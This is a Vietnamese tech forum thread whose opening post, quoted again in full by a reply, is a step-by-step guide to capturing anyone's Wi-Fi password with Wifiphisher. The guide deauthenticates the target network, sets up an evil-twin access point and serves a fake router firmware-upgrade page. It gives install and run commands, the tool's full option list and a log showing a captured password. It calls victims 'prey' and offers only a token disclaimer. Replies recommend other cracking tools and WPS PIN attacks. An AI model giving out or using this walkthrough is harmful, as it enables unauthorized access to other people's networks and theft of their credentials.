Hướng dẫn - Hack bất kỳ mạng Wifi nào mà không cần Cr@ck bằng cách sử dụng Wifiphisher | VN-Zoom | Cộng đồng Chia Sẻ Kiến Thức Công Nghệ và Phần Mềm Máy Tính

Adblocker detected! Please consider reading this notice.

We've detected that you are using AdBlock Plus or some other adblocking software which is preventing the page from fully loading.

We need money to operate the site, and almost all of it comes from our online advertising.

If possible, please support us by clicking on the advertisements.

Please add vn-z.vn to your ad blocking whitelist or disable your adblocking software.

×

Hướng dẫn Hack bất kỳ mạng Wifi nào mà không cần Cr@ck bằng cách sử dụng Wifiphisher

VNZ-ROAD

NEXTVNZ
Bài viết mang mục đích giới thiệu tham khảo , không mang mục đích phá hoại. Hiện nay công nghệ bảo mật của modem wifi cũng được nâng cấp nhiều, tuy nhiên các thiết bị của người dùng thường họ ít quan tâm đến việc cập nhật firmware cho modem của họ. Điều này khiến thiết bị của họ dễ bị tấn công thay đổi cấu hình.v..v Có nhiều cách tấn công mạng wifi , một trong những phương pháp đơn giản nhất là kỹ thuật sử dụng Wifiphisher.


Người tấn công sử dụng Wifiphisher sẽ làm cho bộ định tuyến mục tiêu như đang có vấn đề . Mạng Wi-Fi như bị bị cắt , mục tiêu vẫn có thể nhìn thấy mạng, nhưng mọi nỗ lực kết nối đều thất bại. Các thiết bị khác cũng không thể kết nối với mạng Wifi , không chỉ một thiết bị, mà mọi thiết bị Wi-Fi, đều mất kết nối với mạng Wifi.

Sau đó họ sẽ thấy xuất hiện một mạng Wifi mới có cùng tên với mạng cũ ( Mạng wifi này do hacker tạo ra), nhưng không yêu cầu mật khẩu. Sau khi cố gắng tham gia mạng Wifi được bảo vệ ( của chính họ), họ sẽ đăng nhập vào mạng Wifi mở vì nghĩ rằng bộ định tuyến của họ có vấn đề kỹ thuật nên không cần mật khẩu. Ngay khi họ đăng nhập vào mạng wifi do hacker tạo ra , một trang web có giao diện giống với giao diện của nhà sản xuất bộ định tuyến của họ sẽ được khởi chạy và thông báo cho họ rằng bộ định tuyến của họ cần phải cập nhật firmware quan trọng. Nếu họ không nhập mật khẩu để áp dụng bản cập nhật,thì mạng internet sẽ không hoạt động

Sau khi nhập mật khẩu Wi-Fi , màn hình sẽ thông báo bộ định tuyến khởi động lại và họ sẽ nghĩ răng bộ định tuyến của họ đã được cập nhật firmware an toàn. Sau một vài phút chờ đợi, các thiết bị của họ kết nối lại với mạng.

Như vậy thực tế phương pháp này đơn giản gồm
- Gây nhiễu mạng wifi của đối tượng
- Tạo một mạng Wifi giả giống hệt với mạng Wifi của đối tượng (Evil Twin )
- Tạo một trang web thông báo đối tượng phải cập nhật firmware và yêu cầu nhập mật khẩu để xác thực
- Mật khẩu được gửi đến cho hacker mà đối tượng vẫn nghĩ là mạng của mình được bảo mật an toàn

Dưới đây là cách thực hiện

Bạn cần hai adapter không dây tương thích Kali Linux, hỗ trợ monitor mode và packet injection

NUyH3A4.jpg

Một số loại Adapter bạn có thể tìm kiếm trên Amazon: Alfa AWUS036NH; Alfa AWUS051NH; TP-LINK TL-WN722N; Alfa AWUS036NEH; Panda PAU05; Alfa AWUS036H; Alfa AWUS036NHA.

Ngoài ra bạn sẽ cần máy tính chạy Kali Linux, và cập nhật apt . Nếu bạn không làm điều này, rất có thể bạn sẽ gặp vấn đề trong quá trình cài đặt Wifiphisher.

Bước 1: Install Wifiphisher
Mở máy tính chạy Kali Linux , mở cửa sổ
gõ apt install wifiphisher để cài đặt Wifiphisher.
Mã:
install Wifiphisher.

apt install wifiphisher
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0
  libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160
  libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16
  liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7
  libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26
  libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10
  libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24
  libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21
  libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9
  libradare2-3.0 libsane-extras libsane-extras-common libtbb2
  libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql
  python-anyjson python-capstone python-couchdbkit python-http-parser
  python-jwt python-libemu python-pam python-restkit python-socketpool
  x11proto-dri2-dev x11proto-gl-dev
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
  python-pbkdf2 python-pyric python-roguehostapd
Suggested packages:
  python-pyric-doc
The following NEW packages will be installed:
  python-pbkdf2 python-pyric python-roguehostapd wifiphisher
0 upgraded, 4 newly installed, 0 to remove and 422 not upgraded.
Need to get 4,579 kB of archives.
After this operation, 10.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pbkdf2 all 1.3+20110613.git2a0fb15~ds0-3 [7,398 B]
Get:2 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pyric all 0.1.6-0kali1 [308 kB]
Get:3 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB]
Get:4 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 wifiphisher all 1.4+git20180525-0kali2 [3,862 kB]
Fetched 4,579 kB in 10s (458 kB/s)
Selecting previously unselected package python-pbkdf2.
(Reading database ... 431969 files and directories currently installed.)
Preparing to unpack .../python-pbkdf2_1.3+20110613.git2a0fb15~ds0-3_all.deb ...
Unpacking python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Selecting previously unselected package python-pyric.
Preparing to unpack .../python-pyric_0.1.6-0kali1_all.deb ...
Unpacking python-pyric (0.1.6-0kali1) ...
Selecting previously unselected package python-roguehostapd.
Preparing to unpack .../python-roguehostapd_1.2.3-0kali2_amd64.deb ...
Unpacking python-roguehostapd (1.2.3-0kali2) ...
Selecting previously unselected package wifiphisher.
Preparing to unpack .../wifiphisher_1.4+git20180525-0kali2_all.deb ...
Unpacking wifiphisher (1.4+git20180525-0kali2) ...
Setting up python-roguehostapd (1.2.3-0kali2) ...
Setting up python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Setting up python-pyric (0.1.6-0kali1) ...
Setting up wifiphisher (1.4+git20180525-0kali2) ...

Progress: [ 95%] [#######################################################...]

Bạn có thể cài repo GitHub, làm theo hướng dẫn trên trang GitHub, như sau:
Mã:
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Bước 2: Tìm hiểu Wifiphisher's Flags

Bạn có thể gõ lệnh sudo wifiphisher gõ --help để xem các câu lệnh và chức năng của Wifiphisher

Mã:
wifiphisher --help

Mã:
usage: wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE]
                   [-aI APINTERFACE] [-iI INTERNETINTERFACE]
                   [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE]
                   [-iNM] [-kN] [-nE] [-nD]
                   [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID]
                   [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY]
                   [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT]
                   [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH]
                   [--payload-path PAYLOAD_PATH] [-cM] [-wP]
                   [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH]
                   [-pPD PHISHING_PAGES_DIRECTORY]
                   [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID]

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Manually choose an interface that supports both AP and
                        monitor modes for spawning the rogue AP as well as
                        mounting additional Wi-Fi attacks from Extensions
                        (i.e. deauth). Example: -i wlan1
  -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
                        Manually choose an interface that supports monitor
                        mode for deauthenticating the victims. Example: -eI
                        wlan1
  -aI APINTERFACE, --apinterface APINTERFACE
                        Manually choose an interface that supports AP mode for
                        spawning the rogue AP. Example: -aI wlan0
  -iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
                        Choose an interface that is connected on the
                        InternetExample: -iI ppp0
  -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
                        Specify the MAC address of the AP interface
  -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE
                        Specify the MAC address of the extensions interface
  -iNM, --no-mac-randomization
                        Do not change any MAC address
  -kN, --keepnetworkmanager
                        Do not kill NetworkManager
  -nE, --noextensions   Do not load any extensions.
  -nD, --nodeauth       Skip the deauthentication phase.
  -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]
                        Channels to deauth. Example: --deauth-channels 1,3,7
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue Access Point. This option
                        will skip Access Point selection phase. Example:
                        --essid 'Free WiFi'
  -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
                        Deauth all the BSSIDs in the WLAN with that ESSID.
  -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
                        Choose the phishing scenario to run.This option will
                        skip the scenario selection phase. Example: -p
                        firmware_upgrade
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point.
                        Example: -pK s3cr3tp4ssw0rd
  -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
                        Capture of the WPA/WPA2 handshakes for verifying
                        passphraseExample : -hC capture.pcap
  -qS, --quitonsuccess  Stop the script after successfully retrieving one pair
                        of credentials
  -lC, --lure10-capture
                        Capture the BSSIDs of the APs that are discovered
                        during AP selection phase. This option is part of
                        Lure10 attack.
  -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
                        Fool the Windows Location Service of nearby Windows
                        users to believe it is within an area that was
                        previously captured with --lure10-capture. Part of the
                        Lure10 attack.
  --logging             Log activity to file
  -dK, --disable-karma  Disables KARMA attack
  -lP LOGPATH, --logpath LOGPATH
                        Determine the full path of the logfile.
  -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
                        Determine the full path of the file that will store
                        any captured credentials
  --payload-path PAYLOAD_PATH
                        Payload path for scenarios serving a payload
  -cM, --channel-monitor
                        Monitor if target access point changes the channel.
  -wP, --wps-pbc        Monitor if the button on a WPS-PBC Registrar is
                        pressed.
  -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
                        The WLAN interface used for associating to the WPS
                        AccessPoint.
  -kB, --known-beacons  Broadcast a number of beacon frames advertising
                        popular WLANs
  -fH, --force-hostapd  Force the usage of hostapd installed in the system
  -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY
                        Search for phishing pages in this location
  --dnsmasq-conf DNSMASQ_CONF
                        Determine the full path of a custom dnmasq.conf file
  -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
                        Determine the ESSID you want to use for the phishing
                        page

Bước 3: Cắm Wireless Network Adapter

Cắm Wireless Network Adapter vào máy tính , dùng Wifiphisher để bắt đầu quá trình thực hiện phisher

Bước 4: Chạy đoạn Script

Ở đây bạn có thể dùng các trình thông dịch để chạy script
Với loại USB wireless bạn sẽ cần gõ thêm -i
Để chạy đoạn script bạn gõ lệnh sau
Mã:
sudo wifiphisher -i wlan1

Sau khi chạy đoạn script bạn sẽ thấy một trang hiển thị thông tin tất cả mạng wifi gần đó. Bạn có thể chọn mạng nào mà bạn muốn tấn công và nhấn Enter.

hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14565deec184480a7dd4.jpg


hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14560bc675d4e27cfbd7.jpg

Chọn tùy chọn số 2

Cuộc tấn công ngay lập tức được bắt đầu, Wifiphisher cũng dò các thiết bị đang cố gắng kết nối với các mạng không , nó sẽ tạo các phiên bản đăng nhập giả để thu hút các thiết bị kết nối.
hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14567b17e713585a30b8.jpg

Sau khi mục tiêu đã dính mồi, một cửa sổ bật lên sẽ yêu cầu họ nhập mật khẩu.

hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14563facf2f873e45db0.jpg


hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w1456e1e58aa8c98665fb.jpg

Khi con mồi nhập mật khẩu, Hacker sẽ được thông báo trong màn hình Wifiphisher.

Mã:
[*] Starting Wifiphisher 1.4GIT ( https://wifiphisher.org ) at 2019-02-04 08:10
[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan1 interface for creating the rogue Access Point
[+] Changing wlan1 MAC addr (BSSID) to 00:00:00:31:8c:e5
[!] The MAC address could not be set. (Tried 00:00:00:ee:5c:95)
[+] Sending SIGKILL to wpa_supplicant
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to NetworkManager
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
[*] Starting HTTP/HTTPS server at ports 8080, 443
[+] Show your support!
[+] Follow us: https://twitter.com/wifiphisher
[+] Like us: https://www.facebook.com/Wifiphisher
[+] Captured credentials:
wfphshr-wpa-password=myfatpassword
[!] Closing

Đoạn script đóng và gửi mật khẩu mạng Wifi bị tấn công cho bạn

hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14569f13de82010a9a5c.jpg

Còn đây là màn hình của con mồi

VNZ- ROAD sưu tầm và tổng hợp​
 

VNZ-ROAD

NEXTVNZ
Cách này khả năng kém. Nhiều người họ không vào được là họ tắt đi mở lại điện thoại, không được thì thôi.
Tất cả các thiết bị trong cùng mạng wifi đó đều tịt, trừ phi họ thích dùng 3G,4G thôi. Mà dùng 3G,4G không phải lúc nào cũng sẵn tiền. Tâm lý những người dùng thường là khi họ thấy có mạng wifi khác giống hệt mạng wifi nhà họ là nhấp vào liền.
 

maiphuong

Rìu Bạc Đôi
Bài viết mang mục đích giới thiệu tham khảo , không mang mục đích phá hoại. Hiện nay công nghệ bảo mật của modem wifi cũng được nâng cấp nhiều, tuy nhiên các thiết bị của người dùng thường họ ít quan tâm đến việc cập nhật firmware cho modem của họ. Điều này khiến thiết bị của họ dễ bị tấn công thay đổi cấu hình.v..v Có nhiều cách tấn công mạng wifi , một trong những phương pháp đơn giản nhất là kỹ thuật sử dụng Wifiphisher.


Người tấn công sử dụng Wifiphisher sẽ làm cho bộ định tuyến mục tiêu như đang có vấn đề . Mạng Wi-Fi như bị bị cắt , mục tiêu vẫn có thể nhìn thấy mạng, nhưng mọi nỗ lực kết nối đều thất bại. Các thiết bị khác cũng không thể kết nối với mạng Wifi , không chỉ một thiết bị, mà mọi thiết bị Wi-Fi, đều mất kết nối với mạng Wifi.

Sau đó họ sẽ thấy xuất hiện một mạng Wifi mới có cùng tên với mạng cũ ( Mạng wifi này do hacker tạo ra), nhưng không yêu cầu mật khẩu. Sau khi cố gắng tham gia mạng Wifi được bảo vệ ( của chính họ), họ sẽ đăng nhập vào mạng Wifi mở vì nghĩ rằng bộ định tuyến của họ có vấn đề kỹ thuật nên không cần mật khẩu. Ngay khi họ đăng nhập vào mạng wifi do hacker tạo ra , một trang web có giao diện giống với giao diện của nhà sản xuất bộ định tuyến của họ sẽ được khởi chạy và thông báo cho họ rằng bộ định tuyến của họ cần phải cập nhật firmware quan trọng. Nếu họ không nhập mật khẩu để áp dụng bản cập nhật,thì mạng internet sẽ không hoạt động

Sau khi nhập mật khẩu Wi-Fi , màn hình sẽ thông báo bộ định tuyến khởi động lại và họ sẽ nghĩ răng bộ định tuyến của họ đã được cập nhật firmware an toàn. Sau một vài phút chờ đợi, các thiết bị của họ kết nối lại với mạng.

Như vậy thực tế phương pháp này đơn giản gồm
- Gây nhiễu mạng wifi của đối tượng
- Tạo một mạng Wifi giả giống hệt với mạng Wifi của đối tượng (Evil Twin )
- Tạo một trang web thông báo đối tượng phải cập nhật firmware và yêu cầu nhập mật khẩu để xác thực
- Mật khẩu được gửi đến cho hacker mà đối tượng vẫn nghĩ là mạng của mình được bảo mật an toàn

Dưới đây là cách thực hiện

Bạn cần hai adapter không dây tương thích Kali Linux, hỗ trợ monitor mode và packet injection

hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w1456.jpg

Một loại Adapter bạn có thể tìm kiếm trên Amazon: Alfa AWUS036NH; Alfa AWUS051NH; TP-LINK TL-WN722N; Alfa AWUS036NEH; Panda PAU05; Alfa AWUS036H; Alfa AWUS036NHA.

Ngoài ra bạn sẽ cần máy tính chạy Kali Linux, và cập nhật apt . Nếu bạn không làm điều này, rất có thể bạn sẽ gặp vấn đề trong quá trình cài đặt Wifiphisher.

Bước 1: Install Wifiphisher
Mở máy tính chạy Kali Linux , mở cửa sổ
gõ apt install wifiphisher để cài đặt Wifiphisher.
Mã:
install Wifiphisher.

apt install wifiphisher
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0
  libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160
  libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16
  liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7
  libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26
  libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10
  libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24
  libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21
  libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9
  libradare2-3.0 libsane-extras libsane-extras-common libtbb2
  libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql
  python-anyjson python-capstone python-couchdbkit python-http-parser
  python-jwt python-libemu python-pam python-restkit python-socketpool
  x11proto-dri2-dev x11proto-gl-dev
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
  python-pbkdf2 python-pyric python-roguehostapd
Suggested packages:
  python-pyric-doc
The following NEW packages will be installed:
  python-pbkdf2 python-pyric python-roguehostapd wifiphisher
0 upgraded, 4 newly installed, 0 to remove and 422 not upgraded.
Need to get 4,579 kB of archives.
After this operation, 10.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pbkdf2 all 1.3+20110613.git2a0fb15~ds0-3 [7,398 B]
Get:2 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pyric all 0.1.6-0kali1 [308 kB]
Get:3 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB]
Get:4 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 wifiphisher all 1.4+git20180525-0kali2 [3,862 kB]
Fetched 4,579 kB in 10s (458 kB/s)
Selecting previously unselected package python-pbkdf2.
(Reading database ... 431969 files and directories currently installed.)
Preparing to unpack .../python-pbkdf2_1.3+20110613.git2a0fb15~ds0-3_all.deb ...
Unpacking python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Selecting previously unselected package python-pyric.
Preparing to unpack .../python-pyric_0.1.6-0kali1_all.deb ...
Unpacking python-pyric (0.1.6-0kali1) ...
Selecting previously unselected package python-roguehostapd.
Preparing to unpack .../python-roguehostapd_1.2.3-0kali2_amd64.deb ...
Unpacking python-roguehostapd (1.2.3-0kali2) ...
Selecting previously unselected package wifiphisher.
Preparing to unpack .../wifiphisher_1.4+git20180525-0kali2_all.deb ...
Unpacking wifiphisher (1.4+git20180525-0kali2) ...
Setting up python-roguehostapd (1.2.3-0kali2) ...
Setting up python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Setting up python-pyric (0.1.6-0kali1) ...
Setting up wifiphisher (1.4+git20180525-0kali2) ...

Progress: [ 95%] [#######################################################...]

Bạn có thể cài repo GitHub, làm theo hướng dẫn trên trang GitHub, như sau:
Mã:
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Bước 2: Tìm hiểu Wifiphisher's Flags

Bạn có thể gõ lệnh sudo wifiphisher gõ --help để xem các câu lệnh và chức năng của Wifiphisher

Mã:
wifiphisher --help

Mã:
usage: wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE]
                   [-aI APINTERFACE] [-iI INTERNETINTERFACE]
                   [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE]
                   [-iNM] [-kN] [-nE] [-nD]
                   [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID]
                   [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY]
                   [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT]
                   [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH]
                   [--payload-path PAYLOAD_PATH] [-cM] [-wP]
                   [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH]
                   [-pPD PHISHING_PAGES_DIRECTORY]
                   [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID]

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Manually choose an interface that supports both AP and
                        monitor modes for spawning the rogue AP as well as
                        mounting additional Wi-Fi attacks from Extensions
                        (i.e. deauth). Example: -i wlan1
  -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
                        Manually choose an interface that supports monitor
                        mode for deauthenticating the victims. Example: -eI
                        wlan1
  -aI APINTERFACE, --apinterface APINTERFACE
                        Manually choose an interface that supports AP mode for
                        spawning the rogue AP. Example: -aI wlan0
  -iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
                        Choose an interface that is connected on the
                        InternetExample: -iI ppp0
  -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
                        Specify the MAC address of the AP interface
  -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE
                        Specify the MAC address of the extensions interface
  -iNM, --no-mac-randomization
                        Do not change any MAC address
  -kN, --keepnetworkmanager
                        Do not kill NetworkManager
  -nE, --noextensions   Do not load any extensions.
  -nD, --nodeauth       Skip the deauthentication phase.
  -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]
                        Channels to deauth. Example: --deauth-channels 1,3,7
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue Access Point. This option
                        will skip Access Point selection phase. Example:
                        --essid 'Free WiFi'
  -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
                        Deauth all the BSSIDs in the WLAN with that ESSID.
  -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
                        Choose the phishing scenario to run.This option will
                        skip the scenario selection phase. Example: -p
                        firmware_upgrade
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point.
                        Example: -pK s3cr3tp4ssw0rd
  -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
                        Capture of the WPA/WPA2 handshakes for verifying
                        passphraseExample : -hC capture.pcap
  -qS, --quitonsuccess  Stop the script after successfully retrieving one pair
                        of credentials
  -lC, --lure10-capture
                        Capture the BSSIDs of the APs that are discovered
                        during AP selection phase. This option is part of
                        Lure10 attack.
  -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
                        Fool the Windows Location Service of nearby Windows
                        users to believe it is within an area that was
                        previously captured with --lure10-capture. Part of the
                        Lure10 attack.
  --logging             Log activity to file
  -dK, --disable-karma  Disables KARMA attack
  -lP LOGPATH, --logpath LOGPATH
                        Determine the full path of the logfile.
  -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
                        Determine the full path of the file that will store
                        any captured credentials
  --payload-path PAYLOAD_PATH
                        Payload path for scenarios serving a payload
  -cM, --channel-monitor
                        Monitor if target access point changes the channel.
  -wP, --wps-pbc        Monitor if the button on a WPS-PBC Registrar is
                        pressed.
  -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
                        The WLAN interface used for associating to the WPS
                        AccessPoint.
  -kB, --known-beacons  Broadcast a number of beacon frames advertising
                        popular WLANs
  -fH, --force-hostapd  Force the usage of hostapd installed in the system
  -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY
                        Search for phishing pages in this location
  --dnsmasq-conf DNSMASQ_CONF
                        Determine the full path of a custom dnmasq.conf file
  -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
                        Determine the ESSID you want to use for the phishing
                        page

Bước 3: Cắm Wireless Network Adapter

Cắm Wireless Network Adapter vào máy tính , dùng Wifiphisher để bắt đầu quá trình thực hiện phisher

Bước 4: Chạy đoạn Script

Ở đây bạn có thể dùng các trình thông dịch để chạy script
Với loại USB wireless bạn sẽ cần gõ thêm -i
Để chạy đoạn script bạn gõ lệnh sau
Mã:
sudo wifiphisher -i wlan1

Sau khi chạy đoạn script bạn sẽ thấy một trang hiển thị thông tin tất cả mạng wifi gần đó. Bạn có thể chọn mạng nào mà bạn muốn tấn công và nhấn Enter.

hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14565deec184480a7dd4.jpg


hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14560bc675d4e27cfbd7.jpg

Chọn tùy chọn số 2

Cuộc tấn công ngay lập tức được bắt đầu, Wifiphisher cũng dò các thiết bị đang cố gắng kết nối với các mạng không , nó sẽ tạo các phiên bản đăng nhập giả để thu hút các thiết bị kết nối.
hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14567b17e713585a30b8.jpg

Sau khi mục tiêu đã dính mồi, một cửa sổ bật lên sẽ yêu cầu họ nhập mật khẩu.

hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14563facf2f873e45db0.jpg


hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w1456e1e58aa8c98665fb.jpg

Khi con mồi nhập mật khẩu, Hacker sẽ được thông báo trong màn hình Wifiphisher.

Mã:
[*] Starting Wifiphisher 1.4GIT ( https://wifiphisher.org ) at 2019-02-04 08:10
[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan1 interface for creating the rogue Access Point
[+] Changing wlan1 MAC addr (BSSID) to 00:00:00:31:8c:e5
[!] The MAC address could not be set. (Tried 00:00:00:ee:5c:95)
[+] Sending SIGKILL to wpa_supplicant
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to NetworkManager
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
[*] Starting HTTP/HTTPS server at ports 8080, 443
[+] Show your support!
[+] Follow us: https://twitter.com/wifiphisher
[+] Like us: https://www.facebook.com/Wifiphisher
[+] Captured credentials:
wfphshr-wpa-password=myfatpassword
[!] Closing

Đoạn script đóng và gửi mật khẩu mạng Wifi bị tấn công cho bạn

hack-wi-fi-get-anyones-wi-fi-password-without-cracking-using-wifiphisher.w14569f13de82010a9a5c.jpg

Còn đây là màn hình của con mồi

VNZ- ROAD sưu tầm và tổng hợp​
Cảm ơn bạn đã chia sẻ
Song tôi lại hay dùng Linset or Wifimosys... trên WifiSlax đơn giản hiệu quả cao hơn.
Hack qua mã PIN một số modem cũng hiệu quả
 

cyberat


Junior Moderator
Thành viên BQT
giờ giá mạng cũng rẻ, giá 3g 4g cũng rẻ rồi, mua mớ thiết bị với bỏ công ra có khi mua cái sim 3g cả năm gọn hơn
 

nghqua

Rìu Sắt Đôi
Chơi chặn mac thì kì quá, em để open nhưng limit băng thông, đăng ký cấp ip tinhx cho từng thiết bị nên chỉ vài máy chạy max băng thông
Còn lại thì 1kbps :)))))
 

msnori

Rìu Sắt
Cảm ơn bạn đã chia sẻ
Song tôi lại hay dùng Linset or Wifimosys... trên WifiSlax đơn giản hiệu quả cao hơn.
Hack qua mã PIN một số modem cũng hiệu quả
Dùng wifislax để hack mật khẩu kiểu gì vậy ạ? Trước e có nghịch thử cái này nhưng ko hack được wifi nào cả. Bác có thể làm 1 bài hướng dẫn được không ạ?
 

oViTo

Búa Gỗ
Giờ khó làm hơn trước rồi, ý thức bảo mật của mọi người tốt hơn, các trình duyệt bảo mật hơn...
Nhưng tỷ lệ làm dc vẫn có, gọi là hên xui {feel_good}
 

tvthoi1984

Rìu Vàng Đôi
